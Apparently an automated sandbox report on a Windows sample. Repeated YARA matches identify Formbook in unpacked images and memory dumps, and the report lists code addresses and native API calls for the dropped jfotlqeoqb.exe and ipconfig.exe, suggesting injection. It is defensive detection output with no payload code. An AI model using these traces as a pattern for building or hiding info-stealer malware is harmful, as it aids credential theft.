          Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: skyrunyyu655432.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_004047EE
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00406083
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F6880
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F6880
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F496E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F959D
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F7364
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F7364
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F496E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F959D
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001E38EC
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F85D1
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F6DF2
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F85D1
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F7364
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F496E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F6880
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F6880
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F496E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F959D
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F7364
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F7364
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F496E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F959D
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001E38EC
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F85D1
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F6DF2
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F85D1
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F7364
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001F496E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D805
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041DA33
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041EB32
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041C3EA
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041ED64
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041DD0A
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00409E5E
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00402FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA22AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA1FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA2B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA28EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA20A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA25DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA1D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA2D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DDA33
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DEB32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DC3EA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD805
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024C9E5E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024C9E60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024C2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DED64
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DDD0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024C2D87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024C2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02BDB150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: String function: 001EEFF0 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A45A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A492 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041A53A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1A710 NtOpenProcessToken,
